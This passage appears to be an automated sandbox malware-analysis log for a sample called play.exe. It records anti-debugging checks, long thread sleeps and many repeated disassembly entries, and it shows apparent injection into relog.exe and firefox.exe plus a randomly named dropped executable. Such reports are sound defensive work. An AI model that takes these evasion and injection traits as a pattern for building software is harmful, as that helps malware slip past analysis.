Source: C:\Users\user\Desktop\play.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\relog.exe API coverage: 2.6 %
Source: C:\Windows\SysWOW64\relog.exe TID: 7764 Thread sleep count: 3936 > 30
Source: C:\Windows\SysWOW64\relog.exe TID: 7764 Thread sleep time: -7872000s >= -30000s
Source: C:\Windows\SysWOW64\relog.exe TID: 7764 Thread sleep count: 6035 > 30
Source: C:\Windows\SysWOW64\relog.exe TID: 7764 Thread sleep time: -12070000s >= -30000s
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800 Thread sleep time: -75000s >= -30000s
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800 Thread sleep count: 36 > 30
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800 Thread sleep time: -54000s >= -30000s
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800 Thread sleep count: 38 > 30
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe TID: 7800 Thread sleep time: -38000s >= -30000s
Source: C:\Windows\SysWOW64\relog.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_008CC700 FindFirstFileW,FindNextFileW,FindClose, 5_2_008CC700
Source: relog.exe, 00000005.00000002.4103860914.0000000002C71000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|'[Q7
Source: aAqvujXSGNo.exe, 00000006.00000002.4104075019.0000000000E7F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: firefox.exe, 00000007.00000002.2356033247.000001917377C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\play.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\play.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\relog.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D096E rdtsc 0_2_026D096E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BB8373 LdrLoadDll, 0_2_00BB8373
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BE70C8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00BE70C8
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BE90CB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00BE90CB
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02740274 mov eax, dword ptr fs:[00000030h] 0_2_02740274
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268826B mov eax, dword ptr fs:[00000030h] 0_2_0268826B
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02694260 mov eax, dword ptr fs:[00000030h] 0_2_02694260
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0274A250 mov eax, dword ptr fs:[00000030h] 0_2_0274A250
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0276625D mov eax, dword ptr fs:[00000030h] 0_2_0276625D
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02696259 mov eax, dword ptr fs:[00000030h] 0_2_02696259
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02718243 mov eax, dword ptr fs:[00000030h] 0_2_02718243
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02718243 mov ecx, dword ptr fs:[00000030h] 0_2_02718243
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268A250 mov eax, dword ptr fs:[00000030h] 0_2_0268A250
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268823B mov eax, dword ptr fs:[00000030h] 0_2_0268823B
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A02E1 mov eax, dword ptr fs:[00000030h] 0_2_026A02E1
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A02E1 mov eax, dword ptr fs:[00000030h] 0_2_026A02E1
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A02E1 mov eax, dword ptr fs:[00000030h] 0_2_026A02E1
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027662D6 mov eax, dword ptr fs:[00000030h] 0_2_027662D6
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h] 0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h] 0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h] 0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h] 0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269A2C3 mov eax, dword ptr fs:[00000030h] 0_2_0269A2C3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A02A0 mov eax, dword ptr fs:[00000030h] 0_2_026A02A0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A02A0 mov eax, dword ptr fs:[00000030h] 0_2_026A02A0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h] 0_2_027262A0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027262A0 mov ecx, dword ptr fs:[00000030h] 0_2_027262A0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h] 0_2_027262A0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h] 0_2_027262A0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h] 0_2_027262A0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027262A0 mov eax, dword ptr fs:[00000030h] 0_2_027262A0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CE284 mov eax, dword ptr fs:[00000030h] 0_2_026CE284
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CE284 mov eax, dword ptr fs:[00000030h] 0_2_026CE284
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02710283 mov eax, dword ptr fs:[00000030h] 0_2_02710283
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02710283 mov eax, dword ptr fs:[00000030h] 0_2_02710283
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02710283 mov eax, dword ptr fs:[00000030h] 0_2_02710283
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273437C mov eax, dword ptr fs:[00000030h] 0_2_0273437C
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02738350 mov ecx, dword ptr fs:[00000030h] 0_2_02738350
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275A352 mov eax, dword ptr fs:[00000030h] 0_2_0275A352
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h] 0_2_0271035C
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h] 0_2_0271035C
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h] 0_2_0271035C
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271035C mov ecx, dword ptr fs:[00000030h] 0_2_0271035C
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h] 0_2_0271035C
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271035C mov eax, dword ptr fs:[00000030h] 0_2_0271035C
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h] 0_2_02712349
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h] 0_2_02712349
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h] 0_2_02712349
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h] 0_2_02712349
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h] 0_2_02712349
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h] 0_2_02712349
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h] 0_2_02712349
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h] 0_2_02712349
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h] 0_2_02712349
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h] 0_2_02712349
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h] 0_2_02712349
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h] 0_2_02712349
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h] 0_2_02712349
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h] 0_2_02712349
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02712349 mov eax, dword ptr fs:[00000030h] 0_2_02712349
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0276634F mov eax, dword ptr fs:[00000030h] 0_2_0276634F
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02768324 mov eax, dword ptr fs:[00000030h] 0_2_02768324
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02768324 mov ecx, dword ptr fs:[00000030h] 0_2_02768324
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02768324 mov eax, dword ptr fs:[00000030h] 0_2_02768324
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02768324 mov eax, dword ptr fs:[00000030h] 0_2_02768324
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CA30B mov eax, dword ptr fs:[00000030h] 0_2_026CA30B
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CA30B mov eax, dword ptr fs:[00000030h] 0_2_026CA30B
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CA30B mov eax, dword ptr fs:[00000030h] 0_2_026CA30B
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268C310 mov ecx, dword ptr fs:[00000030h] 0_2_0268C310
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B0310 mov ecx, dword ptr fs:[00000030h] 0_2_026B0310
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h] 0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h] 0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h] 0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h] 0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h] 0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h] 0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h] 0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A03E9 mov eax, dword ptr fs:[00000030h] 0_2_026A03E9
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C63FF mov eax, dword ptr fs:[00000030h] 0_2_026C63FF
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026AE3F0 mov eax, dword ptr fs:[00000030h] 0_2_026AE3F0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026AE3F0 mov eax, dword ptr fs:[00000030h] 0_2_026AE3F0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026AE3F0 mov eax, dword ptr fs:[00000030h] 0_2_026AE3F0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027343D4 mov eax, dword ptr fs:[00000030h] 0_2_027343D4
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027343D4 mov eax, dword ptr fs:[00000030h] 0_2_027343D4
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273E3DB mov eax, dword ptr fs:[00000030h] 0_2_0273E3DB
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273E3DB mov eax, dword ptr fs:[00000030h] 0_2_0273E3DB
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273E3DB mov ecx, dword ptr fs:[00000030h] 0_2_0273E3DB
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273E3DB mov eax, dword ptr fs:[00000030h] 0_2_0273E3DB
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h] 0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h] 0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h] 0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h] 0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h] 0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269A3C0 mov eax, dword ptr fs:[00000030h] 0_2_0269A3C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026983C0 mov eax, dword ptr fs:[00000030h] 0_2_026983C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026983C0 mov eax, dword ptr fs:[00000030h] 0_2_026983C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026983C0 mov eax, dword ptr fs:[00000030h] 0_2_026983C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026983C0 mov eax, dword ptr fs:[00000030h] 0_2_026983C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027163C0 mov eax, dword ptr fs:[00000030h] 0_2_027163C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0274C3CD mov eax, dword ptr fs:[00000030h] 0_2_0274C3CD
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268E388 mov eax, dword ptr fs:[00000030h] 0_2_0268E388
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268E388 mov eax, dword ptr fs:[00000030h] 0_2_0268E388
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268E388 mov eax, dword ptr fs:[00000030h] 0_2_0268E388
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B438F mov eax, dword ptr fs:[00000030h] 0_2_026B438F
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026B438F mov eax, dword ptr fs:[00000030h] 0_2_026B438F
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02688397 mov eax, dword ptr fs:[00000030h] 0_2_02688397
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026BC073 mov eax, dword ptr fs:[00000030h] 0_2_026BC073
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02716050 mov eax, dword ptr fs:[00000030h] 0_2_02716050
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02692050 mov eax, dword ptr fs:[00000030h] 0_2_02692050
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02726030 mov eax, dword ptr fs:[00000030h] 0_2_02726030
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268A020 mov eax, dword ptr fs:[00000030h] 0_2_0268A020
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268C020 mov eax, dword ptr fs:[00000030h] 0_2_0268C020
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02714000 mov ecx, dword ptr fs:[00000030h] 0_2_02714000
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h] 0_2_02732000
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h] 0_2_02732000
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h] 0_2_02732000
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h] 0_2_02732000
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h] 0_2_02732000
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h] 0_2_02732000
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h] 0_2_02732000
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02732000 mov eax, dword ptr fs:[00000030h] 0_2_02732000
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026AE016 mov eax, dword ptr fs:[00000030h] 0_2_026AE016
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026AE016 mov eax, dword ptr fs:[00000030h] 0_2_026AE016
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026AE016 mov eax, dword ptr fs:[00000030h] 0_2_026AE016
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026AE016 mov eax, dword ptr fs:[00000030h] 0_2_026AE016
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026980E9 mov eax, dword ptr fs:[00000030h] 0_2_026980E9
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268A0E3 mov ecx, dword ptr fs:[00000030h] 0_2_0268A0E3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027160E0 mov eax, dword ptr fs:[00000030h] 0_2_027160E0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268C0F0 mov eax, dword ptr fs:[00000030h] 0_2_0268C0F0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D20F0 mov ecx, dword ptr fs:[00000030h] 0_2_026D20F0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027120DE mov eax, dword ptr fs:[00000030h] 0_2_027120DE
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026880A0 mov eax, dword ptr fs:[00000030h] 0_2_026880A0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027560B8 mov eax, dword ptr fs:[00000030h] 0_2_027560B8
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027560B8 mov ecx, dword ptr fs:[00000030h] 0_2_027560B8
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027280A8 mov eax, dword ptr fs:[00000030h] 0_2_027280A8
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269208A mov eax, dword ptr fs:[00000030h] 0_2_0269208A
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02764164 mov eax, dword ptr fs:[00000030h] 0_2_02764164
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02764164 mov eax, dword ptr fs:[00000030h] 0_2_02764164
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02728158 mov eax, dword ptr fs:[00000030h] 0_2_02728158
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02724144 mov eax, dword ptr fs:[00000030h] 0_2_02724144
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02724144 mov eax, dword ptr fs:[00000030h] 0_2_02724144
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02724144 mov ecx, dword ptr fs:[00000030h] 0_2_02724144
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02724144 mov eax, dword ptr fs:[00000030h] 0_2_02724144
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02724144 mov eax, dword ptr fs:[00000030h] 0_2_02724144
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02696154 mov eax, dword ptr fs:[00000030h] 0_2_02696154
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02696154 mov eax, dword ptr fs:[00000030h] 0_2_02696154
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268C156 mov eax, dword ptr fs:[00000030h] 0_2_0268C156
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C0124 mov eax, dword ptr fs:[00000030h] 0_2_026C0124
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02750115 mov eax, dword ptr fs:[00000030h] 0_2_02750115
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273A118 mov ecx, dword ptr fs:[00000030h] 0_2_0273A118
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273A118 mov eax, dword ptr fs:[00000030h] 0_2_0273A118
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273A118 mov eax, dword ptr fs:[00000030h] 0_2_0273A118
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273A118 mov eax, dword ptr fs:[00000030h] 0_2_0273A118
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h] 0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273E10E mov ecx, dword ptr fs:[00000030h] 0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h] 0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h] 0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273E10E mov ecx, dword ptr fs:[00000030h] 0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h] 0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h] 0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273E10E mov ecx, dword ptr fs:[00000030h] 0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273E10E mov eax, dword ptr fs:[00000030h] 0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273E10E mov ecx, dword ptr fs:[00000030h] 0_2_0273E10E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027661E5 mov eax, dword ptr fs:[00000030h] 0_2_027661E5
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C01F8 mov eax, dword ptr fs:[00000030h] 0_2_026C01F8
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0270E1D0 mov eax, dword ptr fs:[00000030h] 0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0270E1D0 mov eax, dword ptr fs:[00000030h] 0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0270E1D0 mov ecx, dword ptr fs:[00000030h] 0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0270E1D0 mov eax, dword ptr fs:[00000030h] 0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0270E1D0 mov eax, dword ptr fs:[00000030h] 0_2_0270E1D0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027561C3 mov eax, dword ptr fs:[00000030h] 0_2_027561C3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027561C3 mov eax, dword ptr fs:[00000030h] 0_2_027561C3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D0185 mov eax, dword ptr fs:[00000030h] 0_2_026D0185
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271019F mov eax, dword ptr fs:[00000030h] 0_2_0271019F
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271019F mov eax, dword ptr fs:[00000030h] 0_2_0271019F
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271019F mov eax, dword ptr fs:[00000030h] 0_2_0271019F
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0271019F mov eax, dword ptr fs:[00000030h] 0_2_0271019F
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02734180 mov eax, dword ptr fs:[00000030h] 0_2_02734180
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02734180 mov eax, dword ptr fs:[00000030h] 0_2_02734180
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0274C188 mov eax, dword ptr fs:[00000030h] 0_2_0274C188
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0274C188 mov eax, dword ptr fs:[00000030h] 0_2_0274C188
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268A197 mov eax, dword ptr fs:[00000030h] 0_2_0268A197
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268A197 mov eax, dword ptr fs:[00000030h] 0_2_0268A197
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0268A197 mov eax, dword ptr fs:[00000030h] 0_2_0268A197
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CA660 mov eax, dword ptr fs:[00000030h] 0_2_026CA660
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CA660 mov eax, dword ptr fs:[00000030h] 0_2_026CA660
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C2674 mov eax, dword ptr fs:[00000030h] 0_2_026C2674
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275866E mov eax, dword ptr fs:[00000030h] 0_2_0275866E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275866E mov eax, dword ptr fs:[00000030h] 0_2_0275866E
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026AC640 mov eax, dword ptr fs:[00000030h] 0_2_026AC640
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269262C mov eax, dword ptr fs:[00000030h] 0_2_0269262C
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C6620 mov eax, dword ptr fs:[00000030h] 0_2_026C6620
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C8620 mov eax, dword ptr fs:[00000030h] 0_2_026C8620
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026AE627 mov eax, dword ptr fs:[00000030h] 0_2_026AE627
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h] 0_2_026A260B
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h] 0_2_026A260B
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h] 0_2_026A260B
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h] 0_2_026A260B
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h] 0_2_026A260B
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h] 0_2_026A260B
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A260B mov eax, dword ptr fs:[00000030h] 0_2_026A260B
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2619 mov eax, dword ptr fs:[00000030h] 0_2_026D2619
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0270E609 mov eax, dword ptr fs:[00000030h] 0_2_0270E609
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027106F1 mov eax, dword ptr fs:[00000030h] 0_2_027106F1
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027106F1 mov eax, dword ptr fs:[00000030h] 0_2_027106F1
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0270E6F2 mov eax, dword ptr fs:[00000030h] 0_2_0270E6F2
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0270E6F2 mov eax, dword ptr fs:[00000030h] 0_2_0270E6F2
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0270E6F2 mov eax, dword ptr fs:[00000030h] 0_2_0270E6F2
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0270E6F2 mov eax, dword ptr fs:[00000030h] 0_2_0270E6F2
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CA6C7 mov ebx, dword ptr fs:[00000030h] 0_2_026CA6C7
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CA6C7 mov eax, dword ptr fs:[00000030h] 0_2_026CA6C7
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CC6A6 mov eax, dword ptr fs:[00000030h] 0_2_026CC6A6
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C66B0 mov eax, dword ptr fs:[00000030h] 0_2_026C66B0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02694690 mov eax, dword ptr fs:[00000030h] 0_2_02694690
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02694690 mov eax, dword ptr fs:[00000030h] 0_2_02694690
